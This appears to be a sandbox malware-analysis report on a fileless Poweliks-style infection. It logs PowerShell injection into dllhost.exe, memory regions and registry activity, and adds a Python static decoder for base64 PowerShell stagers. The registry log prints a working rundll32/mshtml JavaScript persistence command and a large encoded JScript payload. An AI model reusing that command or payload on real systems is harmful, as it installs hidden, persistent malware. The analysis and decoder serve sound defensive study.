Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x76f2eb39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76f1110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76f13519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76f11410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76f149d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x76f13e8e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76f111c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76f1186e True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76b614d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76b646ad True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x76b648ef True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x76b614b3 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76b61469 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76b64304 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x76f1195e True 1
Note: the sandbox reports "Unknown module name" when the export is looked up through a handle it did not see being obtained by name; the module is inferred here from the returned address and the base addresses in the Load rows, and the WS2_32 ordinal names are the long-standing Winsock export ordinals. The set as a whole (GetModuleHandleA/GetProcAddress/LoadLibraryA bootstrapping, Winsock resolved by ordinal, InternetCrackUrlA, CreateProcessA with VirtualAllocEx, WriteProcessMemory, ZwQueueApcThread and ResumeThread, the Reg*/Zw* key and value writers, IsWow64Process) is consistent with a position-independent payload resolving its own imports inside powershell.exe rather than with PowerShell's managed code.
System (6)
Operation Additional Information Success Count
Get Info type = Operating System False 4
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Get Info type = Hardware Information True 1
Environment (79)
Operation Additional Information Success Count
Get Environment String name = MshEnableTrace False 71
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Get Environment String name = HomeDrive, result_out = C: True 1
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Get Environment String name = a True 2
Get Environment String name = a, result_out = iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('… (base64 payload truncated in this copy of the report) True 2
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
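The environment variable a read above carries the stager pattern iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('…'))): the script is kept out of the command line and out of any file, and PowerShell only ever sees it through iex. The Python below is an added example, not code from this report or from the malware. It peels such layers statically, never executing them, handles the three [Text.Encoding] names PowerShell uses (Unicode is UTF-16LE, a common decoding mistake), bounds the nesting depth, and carves any long base64 run in the innermost stage that decodes to an MZ header, which is where an injected image like the 15108-byte region above would typically come from. Because the real payload is truncated on this page, SAMPLE_ENV_A and SAMPLE_WITH_BLOB are constructed stand-ins produced by build_stager, INNER_SCRIPT is an invented placeholder, and the 72-byte "MZ" blob is a fake header, not a PE.

```python
import base64
import re

# Stager shape seen in environment variable "a" above:
#   iex ([Text.Encoding]::<Enc>.GetString([Convert]::FromBase64String('<b64>')))
# The payload is truncated in this copy of the report, so every sample here is constructed.
STAGER = re.compile(
    r"iex\s*\(\s*\[(?:System\.)?Text\.Encoding\]::(ASCII|UTF8|Unicode)\.GetString\(\s*"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# PowerShell's [Text.Encoding]::Unicode is UTF-16LE, not UTF-8.
CODECS = {"ascii": "ascii", "utf8": "utf-8", "unicode": "utf-16-le"}
PS_NAMES = {"ascii": "ASCII", "utf8": "UTF8", "unicode": "Unicode"}


def decode_stage(text):
    """Decode one iex/FromBase64String layer without executing it: (encoding, plaintext) or None."""
    m = STAGER.search(text)
    if not m:
        return None
    enc = m.group(1).lower()
    b64 = re.sub(r"\s+", "", m.group(2))  # base64 may be wrapped across lines
    return enc, base64.b64decode(b64).decode(CODECS[enc], errors="replace")


def unwrap(text, max_layers=8):
    """Peel nested stagers; returns every layer, innermost last. max_layers bounds hostile nesting."""
    layers = [text]
    for _ in range(max_layers):
        stage = decode_stage(layers[-1])
        if stage is None:
            break
        layers.append(stage[1])
    return layers


def find_embedded_pe(text):
    """Carve long base64 runs whose decoded bytes start with an MZ header (a dropped DLL/EXE)."""
    blobs = []
    for m in B64_RUN.finditer(text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64 after all
            continue
        if blob.startswith(b"MZ"):
            blobs.append(blob)
    return blobs


def build_stager(script, enc="ascii"):
    """Constructed-sample generator mirroring the pattern; it is not Poweliks' own builder."""
    b64 = base64.b64encode(script.encode(CODECS[enc])).decode("ascii")
    return f"iex ([Text.Encoding]::{PS_NAMES[enc]}.GetString([Convert]::FromBase64String('{b64}')))"


# Constructed samples (invented placeholders, not the report's payload).
INNER_SCRIPT = "Write-Host 'constructed inner stage'"
SAMPLE_ENV_A = build_stager(build_stager(INNER_SCRIPT, "unicode"), "ascii")
FAKE_PE_B64 = base64.b64encode(b"MZ" + bytes(70)).decode("ascii")  # 72-byte stand-in, MZ header only
SAMPLE_WITH_BLOB = build_stager("$b=[Convert]::FromBase64String('" + FAKE_PE_B64 + "')")


if __name__ == "__main__":
    for i, layer in enumerate(unwrap(SAMPLE_ENV_A)):
        print(f"layer {i}: {layer[:60]}...")
    print("MZ blobs in innermost stage:", len(find_embedded_pe(unwrap(SAMPLE_WITH_BLOB)[-1])))
```

In practice the value of a would be exported from the infected user's environment block (or from the registry key that seeds it) and passed to unwrap; the returned layers are what to read, hash and detonate separately, and any carved MZ blob is the artefact to compare against the region dumped from dllhost.exe.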
Process #7: dllhost.exe
(Host: 151, Network: 7)
Information Value
ID #7
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\syswow64\dllhost.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:31, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:41
OS Process Information
Information Value
PID 0x220
Parent PID 0x578 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x26C, 0x718, 0x320, 0x310, 0x740, 0x47C, 0x480
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
private_0x0000000000060000 0x00060000 0x00063fff Private Memory Readable, Writable, Executable True False False
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True True False
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x000c0000 0x000c0fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable True False False
index.dat 0x000e0000 0x000ebfff Memory Mapped File Readable, Writable True False False
index.dat 0x000f0000 0x000f7fff Memory Mapped File Readable, Writable True False False
index.dat 0x00100000 0x0010ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x001bffff Private Memory Readable, Writable True False False
private_0x00000000001c0000 0x001c0000 0x001fffff Private Memory Readable, Writable True False False
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True False False
locale.nls 0x00370000 0x003d6fff Memory Mapped File Readable False False False
pagefile_0x00000000003e0000 0x003e0000 0x00567fff Pagefile Backed Memory Readable True False False
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory Readable, Writable True False False
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable True False False
private_0x0000000000740000 0x00740000 0x0086ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000740000 0x00740000 0x0081efff Pagefile Backed Memory Readable True False False
private_0x0000000000830000 0x00830000 0x0086ffff Private Memory Readable, Writable True False False
private_0x0000000000870000 0x00870000 0x0099ffff Private Memory Readable, Writable True True False
private_0x0000000000870000 0x00870000 0x008effff Private Memory Readable, Writable True False False
private_0x0000000000890000 0x00890000 0x008cffff Private Memory Readable, Writable True True False
private_0x0000000000900000 0x00900000 0x0093ffff Private Memory Readable, Writable True False False
private_0x0000000000960000 0x00960000 0x0099ffff Private Memory Readable, Writable True False False
dllhost.exe 0x00a50000 0x00a54fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False
private_0x0000000001e60000 0x01e60000 0x0418cfff Private Memory Readable, Writable, Executable True False False
sortdefault.nls 0x04190000 0x0445efff Memory Mapped File Readable False False False
private_0x0000000004460000 0x04460000 0x0466ffff Private Memory Readable, Writable True True False
private_0x00000000044b0000 0x044b0000 0x044effff Private Memory Readable, Writable True False False
private_0x0000000004550000 0x04550000 0x0458ffff Private Memory Readable, Writable True False False
private_0x00000000045c0000 0x045c0000 0x045fffff Private Memory Readable, Writable True False False
private_0x0000000004630000 0x04630000 0x0466ffff Private Memory Readable, Writable True False False
private_0x0000000004670000 0x04670000 0x0486ffff Private Memory Readable, Writable True False False
private_0x0000000004670000 0x04670000 0x0481ffff Private Memory Readable, Writable True False False
private_0x0000000004670000 0x04670000 0x047fffff Private Memory Readable, Writable True False False
private_0x0000000004810000 0x04810000 0x0481ffff Private Memory Readable, Writable True False False
private_0x0000000004830000 0x04830000 0x0486ffff Private Memory Readable, Writable True False False
dnsapi.dll 0x73960000 0x739a3fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x73fd0000 0x7404ffff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74190000 0x741ebfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x741f0000 0x7422efff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x74260000 0x74267fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x75430000 0x75450fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x754b0000 0x754b5fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x754c0000 0x754f7fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x75500000 0x75507fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x75510000 0x75521fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x75530000 0x7553ffff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x75540000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x75550000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x75560000 0x756fdfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75700000 0x7570afff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x75710000 0x75726fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x75730000 0x7576bfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x75770000 0x75776fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x75780000 0x7579bfff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x757c0000 0x7581ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75820000 0x75854fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75860000 0x7590bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x759a0000 0x75b9afff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75ba0000 0x75c9ffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75ca0000 0x768e9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x768f0000 0x7697ffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
imagehlp.dll 0x76b00000 0x76b29fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76b40000 0x76b49fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x76b50000 0x76beffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76bf0000 0x76cdffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ce0000 0x76d6efff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76d70000 0x76db5fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76dc0000 0x76e5cfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76ee0000 0x76ef8fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f00000 0x7700ffff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x771c0000 0x77204fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77210000 0x7736bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77370000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77470000 0x774cffff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x77590000 0x776c5fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x776d0000 0x776d5fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x776e0000 0x77736fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x77740000 0x7785cfff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077860000 0x77860000 0x77959fff Private Memory Readable, Writable, Executable True False False
private_0x0000000077960000 0x77960000 0x77a7efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x77c30000 0x77c3bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77c60000 0x77ddffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0x174 address = 0x60000, size = 15108 True 1
Fn
Data
Modify Control Flow #6: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0x174 os_tid = 0x26c, address = 0x60000 True 1
Fn
Host Behavior
Registry (33)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 3
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 6
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 2
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = 35 True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = s, data = 0 False 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 6
Fn
